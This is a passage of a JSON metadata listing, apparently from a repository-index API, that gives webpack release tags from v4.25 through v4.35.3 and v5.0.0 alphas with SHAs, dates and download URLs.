itHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sh